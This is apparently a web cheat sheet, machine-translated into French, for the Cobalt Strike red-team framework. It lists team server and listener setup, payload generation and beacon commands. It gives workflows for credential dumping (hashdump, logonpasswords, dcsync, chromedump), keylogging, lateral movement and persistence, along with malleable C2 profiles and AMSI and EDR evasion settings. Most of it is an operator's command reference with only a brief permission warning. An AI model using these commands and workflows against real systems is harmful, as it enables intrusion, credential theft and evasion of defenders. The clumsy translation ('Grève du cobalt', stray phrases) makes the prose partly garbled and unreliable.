Aller au contenu

Grève du cobalt Feuille de chaleur

Copier toutes les commandes Générer PDF

Aperçu général

Cobalt Strike est une plate-forme d'essais de pénétration commerciale et d'opérations de l'équipe rouge conçue pour émuler les acteurs de menaces avancés. Il fournit un cadre de post-exploitation qui permet aux opérateurs de déployer des balises (agents) sur des systèmes compromis, d'établir des canaux de commande et de contrôle (C2) et d'effectuer diverses opérations offensives de sécurité.

C'est pas vrai. Attention: Cobalt Strike est un outil de test de sécurité commerciale qui ne devrait être utilisé que dans les environnements où vous avez la permission explicite de le faire.

Composantes de base

Serveur d'équipe

  • Serveur central de commande et de contrôle
  • Exécute sous Linux
  • Gérer les balises et les auditeurs
  • Collaboration pour les opérations de l'équipe

Client

  • Application GUI basée sur Java
  • Se connecte à Team Server
  • Interface permettant aux opérateurs d'interagir avec les balises
  • Visualise les réseaux cibles

Beacon

  • Charge utile principale après exploitation
  • Établit la communication avec Team Server
  • Fournit diverses capacités pour les opérations offensives
  • Peut fonctionner en différents modes de communication

Configuration et configuration

Configuration du serveur Team

# Start the Team Server
./teamserver <ip_address> <password> [malleable_c2_profile]

# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile

Configuration du client

1. Launch the Cobalt Strike client
2. Connect > New Connection
3. Enter Team Server details:
   - Host: <team_server_ip>
   - Port: 50050 (default)
   - User: <username>
   - Password: <password>
4. Verify SSL certificate fingerprint
```_

## Auditeurs

### Créer des auditeurs
  1. Cobalt Strike > Listeners
  2. Click "Add"
  3. Configure listener settings:
  4. Name:
  5. Payload:
  6. Host:
  7. Port:
  8. Profile:
  9. Click "Save"

### Types d'auditeurs

|Type|Description|
|------|-------------|
|HTTP|Uses HTTP for C2 communication|
|HTTPS|Uses HTTPS for C2 communication|
|DNS|Uses DNS queries for stealthy C2|
|SMB|Uses named pipes for peer-to-peer C2|
|TCP|Uses direct TCP connections|
|Foreign|Integrates with other C2 frameworks|

## Génération de charge utile

### Types de charge utile de Beacon

Attacks > Packages > 


|Payload Type|Description|
|--------------|-------------|
|Windows Executable|Standard .exe file|
|Windows Service EXE|Service executable|
|DLL|Dynamic Link Library|
|PowerShell|PowerShell one-liner|
|Python|Python script|
|Office Macro|Macro for Office documents|
|Shellcode|Raw shellcode|

### Trousse pour artéfacts

Attacks > Packages > Windows Executable (S)

- Génére des charges utiles personnalisées avec des techniques d'évasion
- Modifier les signatures pour éviter la détection
- Modèles personnalisables

## Commandes Beacon

### Gestion des séances

|Command|Description|
|---------|-------------|
|`help`|Display help information|
|`sleep [seconds] [jitter%]`|Set sleep time and jitter|
|`checkin`|Force immediate check-in|
|`exit`|Terminate the beacon session|
|`clear`|Clear the beacon's task queue|
|`jobs`|List running jobs|
|`jobkill [JID]`|Kill a running job|
|`mode dns`|Switch to DNS mode|
|`mode dns-txt`|Switch to DNS-TXT mode|
|`mode dns6`|Switch to DNS6 mode|
|`mode http`|Switch to HTTP mode|
|`mode smb`|Switch to SMB mode|

### Collecte d'informations

|Command|Description|
|---------|-------------|
|`hostname`|Get the hostname|
|`ipconfig`|Display network configuration|
|`netstat`|Display network connections|
|`ps`|List running processes|
|`tasklist`|Alternative to ps|
|`getuid`|Get current user ID|
|`whoami`|Get detailed user information|
|`pwd`|Print working directory|
|`drives`|List available drives|
|`dir [directory]`|List files in directory|
|`ls [directory]`|Alternative to dir|
|`net [command]`|Execute net command|
|`reg query [path]`|Query registry|
|`sysinfo`|Get system information|

### Opérations de fichiers

|Command|Description|
|---------|-------------|
|`cd [directory]`|Change directory|
|`cp [source] [destination]`|Copy a file|
|`mkdir [directory]`|Create a directory|
|`mv [source] [destination]`|Move or rename a file|
|`rm [file]`|Delete a file|
|`rmdir [directory]`|Delete a directory|
|`cat [file]`|Display file contents|
|`download [file]`|Download a file from target|
|`upload [file]`|Upload a file to target|
|`timestomp [file] [template]`|Modify file timestamps|
|`ls-acl [file]`|List file permissions|

### Opérations de traitement

|Command|Description|
|---------|-------------|
|`execute [program]`|Execute without capturing output|
|`shell [command]`|Execute and capture output|
|`run [program]`|Execute a program|
|`runas [user] [password] [program]`|Execute as another user|
|`pth [user] [domain] [hash]`|Pass-the-hash to create a token|
|`steal_token [pid]`|Steal token from process|
|`make_token [domain] [user] [password]`|Create a token|
|`rev2self`|Revert to original token|
|`getprivs`|Enable system privileges|
|`getsystem`|Attempt to get SYSTEM privileges|
|`execute-assembly [file.exe]`|Execute .NET assembly in memory|
|`powerpick [command]`|Execute PowerShell without powershell.exe|
|`powershell [command]`|Execute PowerShell command|
|`psinject [pid] [command]`|Execute PowerShell in specific process|
|`shinject [pid] [arch] [file.bin]`|Inject shellcode into process|
|`dllinject [pid] [file.dll]`|Inject DLL into process|
|`dllload [file.dll]`|Load DLL in beacon process|

### Mouvement latéral

|Command|Description|
|---------|-------------|
|`psexec [target] [listener]`|Use PsExec to deploy beacon|
|`psexec_psh [target] [listener]`|Use PsExec with PowerShell|
|`winrm [target] [listener]`|Use WinRM to deploy beacon|
|`wmi [target] [listener]`|Use WMI to deploy beacon|
|`ssh [target:port] [user] [pass] [listener]`|Use SSH to deploy beacon|
|`ssh-key [target:port] [user] [key] [listener]`|Use SSH with key authentication|
|`dcsync [domain] [user]`|Use DCSync to extract password hashes|
|`jump [method] [target] [listener]`|Jump to target using specified method|
|`remote-exec [method] [target] [command]`|Execute command on remote system|

### Piquant

|Command|Description|
|---------|-------------|
|`rportfwd [bind port] [forward host] [forward port]`|Set up reverse port forward|
|`rportfwd stop [bind port]`|Stop reverse port forward|
|`socks [port]`|Start SOCKS proxy server|
|`socks stop`|Stop SOCKS proxy server|
|`spunnel [host] [port]`|Create encrypted tunnel over SMB|
|`spunnel stop`|Stop encrypted tunnel|
|`covertvpn [interface] [IP/Mask]`|Deploy Covert VPN interface|
|`covertvpn stop`|Stop Covert VPN|
|`pivot [host] [port]`|List pivot listeners|
|`pivotlistener [host] [port]`|Create pivot listener|

### Après exploitation

|Command|Description|
|---------|-------------|
|`mimikatz [command]`|Execute Mimikatz command|
|`hashdump`|Dump password hashes|
|`logonpasswords`|Dump credentials from memory|
|`keylogger [pid]`|Start keylogger|
|`screenshot [pid]`|Take screenshot|
|`screenwatch [pid]`|Watch target's screen|
|`printscreen`|Take screenshot using PrintScreen|
|`reg query [path]`|Query registry|
|`powerview [command]`|Execute PowerView command|
|`portscan [targets] [ports] [discovery method]`|Scan for open ports|
|`browserpivot [pid] [port]`|Hijack authenticated web sessions|
|`chromedump`|Dump Chrome cookies and login data|
|`persist [method] [listener]`|Set up persistence|
|`elevate [exploit] [listener]`|Attempt privilege escalation|

## Profils C2 malléables

### Structure de base

Global options

set sleeptime "5000"; set jitter "10"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

HTTP staging

http-stager \\{ set uri "/jquery-3.3.1.min.js"; client \\{ header "Accept" "text/javascript, application/javascript, /"; \\} server \\{ header "Content-Type" "application/javascript"; \\} \\}

HTTP client

http-get \\{ set uri "/api/v1/data"; client \\{ header "Accept" "application/json"; metadata \\{ base64; prepend "session="; append ";"; header "Cookie"; \\} \\} server \\{ header "Content-Type" "application/json"; output \\{ json \\{ "status" "success"; "data" ""; \\} prepend "\\{\"data\":\""; append "\"\\}"; base64; \\} \\} \\}


### Profils d'essai
```bash
# Verify profile syntax
./c2lint c2-profiles/normal/amazon.profile

# Start Team Server with profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile

Scénarios de l'agresseur

Structure de base du script

# Event handlers
on beacon_initial \\\\{
    println("New beacon: " . $1);
\\\\}

# Aliases (custom commands)
alias hello \\\\{
    blog($1, "Hello, World!");
\\\\}

# Menus
popup beacon_bottom \\\\{
    item "Custom Command" \\\\{
        blog($1, "Executing custom command...");
        bshell($1, "whoami");
    \\\\}
\\\\}

# Functions
sub get_system_info \\\\{
    bshell($1, "systeminfo");
\\\\}

Fonctions communes de script

Function Description
blog($1, "message") Write to beacon console
bshell($1, "command") Execute shell command
bpowershell($1, "command") Execute PowerShell command
bpowerpick($1, "command") Execute PowerShell without powershell.exe
bexecute_assembly($1, "/path/to/file.exe") Execute .NET assembly
bdllspawn($1, "/path/to/file.dll") Inject Reflective DLL
bpsexec($1, "target", "listener") Execute PsExec lateral movement
bwmi($1, "target", "listener") Execute WMI lateral movement
bwinrm($1, "target", "listener") Execute WinRM lateral movement

OPSEC Considérations

Injection de procédé

# Set parent process for new processes
ppid [pid]

# Set process to spawn for post-ex jobs
spawnto x64 %windir%\\sysnative\\rundll32.exe
spawnto x86 %windir%\\syswow64\\rundll32.exe

# Mask command-line arguments
argue [command] [fake arguments]

# Block non-Microsoft DLLs
blockdlls start
blockdlls stop

Techniques d'évacuation

# Obfuscate beacon in memory
sleep_mask [seconds] [jitter%]

# Configure staging process
stage \\\\{
    set obfuscate "true";
    set stomppe "true";
    set cleanup "true";
\\\\}

# Disable AMSI
amsi_disable

# Use smarter process injection
smartinject

Flux de travail communs

Accès initial

1. Create a listener (Cobalt Strike > Listeners)
2. Generate a payload (Attacks > Packages)
3. Deliver payload to target
4. Wait for beacon check-in

Escalade des privilèges

1. Check current privileges: getuid
2. Attempt to get SYSTEM: getsystem
3. If unsuccessful, try specific exploits: elevate [exploit] [listener]
4. Verify new privileges: getuid

Récolte crédible

1. Dump hashes: hashdump
2. Dump credentials from memory: logonpasswords
3. Use Mimikatz for advanced options: mimikatz [command]
4. Extract domain hashes (if DC): dcsync [domain] [user]

Mouvement latéral

1. Identify targets: net view
2. Choose lateral movement technique:
   - psexec [target] [listener]
   - winrm [target] [listener]
   - wmi [target] [listener]
3. Verify new beacon check-in

Persistance

1. Choose persistence method:
   - persist [method] [listener]
   - schtasks [options]
   - service [options]
   - registry [options]
2. Verify persistence works
3. Document persistence mechanisms for cleanup

Ressources

  • [Document officiel de grève du cobalt] (LINK_5)
  • [Guide de l'utilisateur de la grève du cobalt] (LINK_5)
  • [Profils malléables C2] (LINK_5)
  • [Documentation du script de l'agresseur] (LINK_5)
  • Cobalt Strike Cartographie MITRE ATT&CK